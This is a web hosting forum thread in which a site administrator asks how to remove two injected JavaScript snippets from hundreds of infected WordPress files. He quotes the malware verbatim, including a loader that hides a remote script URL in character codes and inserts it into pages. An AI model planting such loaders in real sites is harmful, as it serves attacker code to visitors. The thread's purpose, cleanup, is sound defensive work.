Infected with a virus in a bunch of sites. Want to find a multi-line string and remove it from hundreds of files.

[Parachutech]

I host a bunch of websites that got infected due to an insecure WordPress management plugin (InfiniteWP). I have WHM/cPanel, and ImunifyAV+ and ConfigServer Exploit Scanner. Those have failed to fully remove the injected scripts. ImunifyAV+ has removed a bunch, but for some reason, not all. Not half, even. I'm actually confused why it got some but not all. I'd even scan the entire server, and it would say it was clean, or a single user, and it's clean. But then I scan a folder I know has infection, and it finds it.

The infected files are all located in subdirectories of /home2/

There are 2 scripts that are all over the place. They inserted themselves at the beginning of a bunch of files (mostly php files). The added strings are multiple lines.

String 1:

var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
 
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

String 2:

var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

I'm trying to find out how to do, essentially, a find/replace inside the files to strip out those strings. I'm trying to convert those strings into a single line so grep will show them so I might figure out how to remove them with sed, so I'm replacing the line breaks with \r\n, but grep isn't finding them. Here's an example grep command I ran in a folder I know contains the string, but it found none:

grep -ir -Pzo "var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl;if (document.currentScript) {document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName('head')[0].appendChild(s);}" *

If I just search for a part of the string that's on one line (I used some of the charcode numbers), I get a ton of results.

So I want to strip out of existing files any instances of the 2 strings above, while leaving the files in place. Can anyone help? Thank you.

 

[cPanelLauren]

If these are WordPress core files, this may be a lot of effort put into something that can be resolved more efficiently, there are plugins that will replace these with known good copies of the file.

Otherwise to find/replace a string you could do something like what's listed here How can I replace a string in a file(s)?

 

[Parachutech]

I restored the infected accounts from backup before the infection. That was easier than trying to clean it up.

 

[rackaid]

Did ImmunifyAV detect the issue? Their pro version can auto-clean some files.